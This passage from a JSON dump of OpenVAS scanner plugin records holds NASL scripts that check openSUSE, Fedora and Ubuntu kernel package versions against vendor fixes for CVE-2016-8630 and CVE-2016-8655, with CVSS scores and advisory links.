isrpmvuln(pkg:\"hdjmod-kmp-default\", rpm:\"hdjmod-kmp-default~1.28_k4.1.36_38~28.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"hdjmod-kmp-default-debuginfo\", rpm:\"hdjmod-kmp-default-debuginfo~1.28_k4.1.36_38~28.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = 
isrpmvuln(pkg:\"hdjmod-kmp-pv\", rpm:\"hdjmod-kmp-pv~1.28_k4.1.36_38~28.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"hdjmod-kmp-pv-debuginfo\", rpm:\"hdjmod-kmp-pv-debuginfo~1.28_k4.1.36_38~28.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"hdjmod-kmp-xen\", rpm:\"hdjmod-kmp-xen~1.28_k4.1.36_38~28.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"hdjmod-kmp-xen-debuginfo\", rpm:\"hdjmod-kmp-xen-debuginfo~1.28_k4.1.36_38~28.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ipset\", rpm:\"ipset~6.25.1~9.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ipset-debuginfo\", rpm:\"ipset-debuginfo~6.25.1~9.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ipset-debugsource\", rpm:\"ipset-debugsource~6.25.1~9.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ipset-devel\", rpm:\"ipset-devel~6.25.1~9.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ipset-kmp-default\", rpm:\"ipset-kmp-default~6.25.1_k4.1.36_38~9.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ipset-kmp-default-debuginfo\", rpm:\"ipset-kmp-default-debuginfo~6.25.1_k4.1.36_38~9.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ipset-kmp-pv\", rpm:\"ipset-kmp-pv~6.25.1_k4.1.36_38~9.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ipset-kmp-pv-debuginfo\", rpm:\"ipset-kmp-pv-debuginfo~6.25.1_k4.1.36_38~9.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ipset-kmp-xen\", rpm:\"ipset-kmp-xen~6.25.1_k4.1.36_38~9.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = 
isrpmvuln(pkg:\"ipset-kmp-xen-debuginfo\", rpm:\"ipset-kmp-xen-debuginfo~6.25.1_k4.1.36_38~9.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default\", rpm:\"kernel-default~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-base\", rpm:\"kernel-default-base~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-base-debuginfo\", rpm:\"kernel-default-base-debuginfo~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-debuginfo\", rpm:\"kernel-default-debuginfo~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-debugsource\", rpm:\"kernel-default-debugsource~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-devel\", rpm:\"kernel-default-devel~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-obs-build\", rpm:\"kernel-obs-build~4.1.36~38.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-obs-build-debugsource\", rpm:\"kernel-obs-build-debugsource~4.1.36~38.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-obs-qa\", rpm:\"kernel-obs-qa~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-syms\", rpm:\"kernel-syms~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libipset3\", rpm:\"libipset3~6.25.1~9.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libipset3-debuginfo\", rpm:\"libipset3-debuginfo~6.25.1~9.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = 
isrpmvuln(pkg:\"pcfclock\", rpm:\"pcfclock~0.44~270.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"pcfclock-debuginfo\", rpm:\"pcfclock-debuginfo~0.44~270.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"pcfclock-debugsource\", rpm:\"pcfclock-debugsource~0.44~270.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"pcfclock-kmp-default\", rpm:\"pcfclock-kmp-default~0.44_k4.1.36_38~270.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"pcfclock-kmp-default-debuginfo\", rpm:\"pcfclock-kmp-default-debuginfo~0.44_k4.1.36_38~270.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"pcfclock-kmp-pv\", rpm:\"pcfclock-kmp-pv~0.44_k4.1.36_38~270.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"pcfclock-kmp-pv-debuginfo\", rpm:\"pcfclock-kmp-pv-debuginfo~0.44_k4.1.36_38~270.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vhba-kmp-debugsource\", rpm:\"vhba-kmp-debugsource~20140928~9.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vhba-kmp-default\", rpm:\"vhba-kmp-default~20140928_k4.1.36_38~9.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vhba-kmp-default-debuginfo\", rpm:\"vhba-kmp-default-debuginfo~20140928_k4.1.36_38~9.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vhba-kmp-pv\", rpm:\"vhba-kmp-pv~20140928_k4.1.36_38~9.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vhba-kmp-pv-debuginfo\", rpm:\"vhba-kmp-pv-debuginfo~20140928_k4.1.36_38~9.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vhba-kmp-xen\", rpm:\"vhba-kmp-xen~20140928_k4.1.36_38~9.2\", 
rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vhba-kmp-xen-debuginfo\", rpm:\"vhba-kmp-xen-debuginfo~20140928_k4.1.36_38~9.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-docs\", rpm:\"kernel-docs~4.1.36~38.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-docs-html\", rpm:\"kernel-docs-html~4.1.36~38.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-docs-pdf\", rpm:\"kernel-docs-pdf~4.1.36~38.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-macros\", rpm:\"kernel-macros~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-source\", rpm:\"kernel-source~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-source-vanilla\", rpm:\"kernel-source-vanilla~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"drbd\", rpm:\"drbd~8.4.6~12.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"drbd-debugsource\", rpm:\"drbd-debugsource~8.4.6~12.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"drbd-kmp-default\", rpm:\"drbd-kmp-default~8.4.6_k4.1.36_38~12.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"drbd-kmp-default-debuginfo\", rpm:\"drbd-kmp-default-debuginfo~8.4.6_k4.1.36_38~12.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"drbd-kmp-pv\", rpm:\"drbd-kmp-pv~8.4.6_k4.1.36_38~12.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = 
isrpmvuln(pkg:\"drbd-kmp-pv-debuginfo\", rpm:\"drbd-kmp-pv-debuginfo~8.4.6_k4.1.36_38~12.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"drbd-kmp-xen\", rpm:\"drbd-kmp-xen~8.4.6_k4.1.36_38~12.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"drbd-kmp-xen-debuginfo\", rpm:\"drbd-kmp-xen-debuginfo~8.4.6_k4.1.36_38~12.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"lttng-modules\", rpm:\"lttng-modules~2.7.0~6.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"lttng-modules-debugsource\", rpm:\"lttng-modules-debugsource~2.7.0~6.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"lttng-modules-kmp-default\", rpm:\"lttng-modules-kmp-default~2.7.0_k4.1.36_38~6.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"lttng-modules-kmp-default-debuginfo\", rpm:\"lttng-modules-kmp-default-debuginfo~2.7.0_k4.1.36_38~6.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"lttng-modules-kmp-pv\", rpm:\"lttng-modules-kmp-pv~2.7.0_k4.1.36_38~6.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"lttng-modules-kmp-pv-debuginfo\", rpm:\"lttng-modules-kmp-pv-debuginfo~2.7.0_k4.1.36_38~6.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae\", rpm:\"kernel-pae~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae-base\", rpm:\"kernel-pae-base~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae-base-debuginfo\", rpm:\"kernel-pae-base-debuginfo~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae-debuginfo\", 
rpm:\"kernel-pae-debuginfo~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae-debugsource\", rpm:\"kernel-pae-debugsource~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae-devel\", rpm:\"kernel-pae-devel~4.1.36~38.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"hdjmod-kmp-pae\", rpm:\"hdjmod-kmp-pae~1.28_k4.1.36_38~28.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"hdjmod-kmp-pae-debuginfo\", rpm:\"hdjmod-kmp-pae-debuginfo~1.28_k4.1.36_38~28.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ipset-kmp-pae\", rpm:\"ipset-kmp-pae~6.25.1_k4.1.36_38~9.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ipset-kmp-pae-debuginfo\", rpm:\"ipset-kmp-pae-debuginfo~6.25.1_k4.1.36_38~9.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"pcfclock-kmp-pae\", rpm:\"pcfclock-kmp-pae~0.44_k4.1.36_38~270.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"pcfclock-kmp-pae-debuginfo\", rpm:\"pcfclock-kmp-pae-debuginfo~0.44_k4.1.36_38~270.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vhba-kmp-pae\", rpm:\"vhba-kmp-pae~20140928_k4.1.36_38~9.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vhba-kmp-pae-debuginfo\", rpm:\"vhba-kmp-pae-debuginfo~20140928_k4.1.36_38~9.2\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:00", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-8630"], "description": 
"The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2016-12-02T00:00:00", "id": "OPENVAS:1361412562310810127", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810127", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2016-14c4187e3a", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kernel FEDORA-2016-14c4187e3a\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810127\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-02 14:04:28 +0100 (Fri, 02 Dec 2016)\");\n script_cve_id(\"CVE-2016-8630\");\n script_tag(name:\"cvss_base\", value:\"4.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for kernel FEDORA-2016-14c4187e3a\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"kernel on Fedora 24\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-14c4187e3a\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/A3WA5MYDRY3QJVY6IVR26CQWNLKQRBYB\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC24\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC24\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.8.7~200.fc24\", rls:\"FC24\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:35:02", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-8630"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2016-12-07T00:00:00", "id": "OPENVAS:1361412562310871927", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871927", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2016-876deae183", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kernel FEDORA-2016-876deae183\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871927\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-07 05:20:29 +0100 (Wed, 07 Dec 2016)\");\n script_cve_id(\"CVE-2016-8630\");\n script_tag(name:\"cvss_base\", value:\"4.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for kernel FEDORA-2016-876deae183\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"kernel on Fedora 25\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-876deae183\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PK5IJ4CPHNMANKL4YU4JWFENHMEBSJF5\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC25\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.8.7~300.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:35:14", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-8655"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2016-12-06T00:00:00", "id": "OPENVAS:1361412562310842980", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842980", "type": "openvas", "title": "Ubuntu Update for linux USN-3149-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux USN-3149-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842980\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-06 05:39:43 +0100 (Tue, 06 Dec 2016)\");\n script_cve_id(\"CVE-2016-8655\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux USN-3149-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Philip Pettersson discovered a race condition in the af_packet\nimplementation in the Linux kernel. 
A local unprivileged attacker could use\nthis to cause a denial of service (system crash) or run arbitrary code with\nadministrative privileges.\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3149-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3149-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU14\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-105-generic\", ver:\"3.13.0-105.152\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-105-generic-lpae\", ver:\"3.13.0-105.152\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-105-lowlatency\", ver:\"3.13.0-105.152\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-105-powerpc-e500\", ver:\"3.13.0-105.152\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-105-powerpc-e500mc\", ver:\"3.13.0-105.152\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-105-powerpc-smp\", ver:\"3.13.0-105.152\", 
rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-105-powerpc64-emb\", ver:\"3.13.0-105.152\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-105-powerpc64-smp\", ver:\"3.13.0-105.152\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic\", ver:\"3.13.0.105.113\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae\", ver:\"3.13.0.105.113\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency\", ver:\"3.13.0.105.113\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-e500\", ver:\"3.13.0.105.113\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-e500mc\", ver:\"3.13.0.105.113\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-smp\", ver:\"3.13.0.105.113\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-emb\", ver:\"3.13.0.105.113\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-smp\", ver:\"3.13.0.105.113\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:36", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-8655"], 
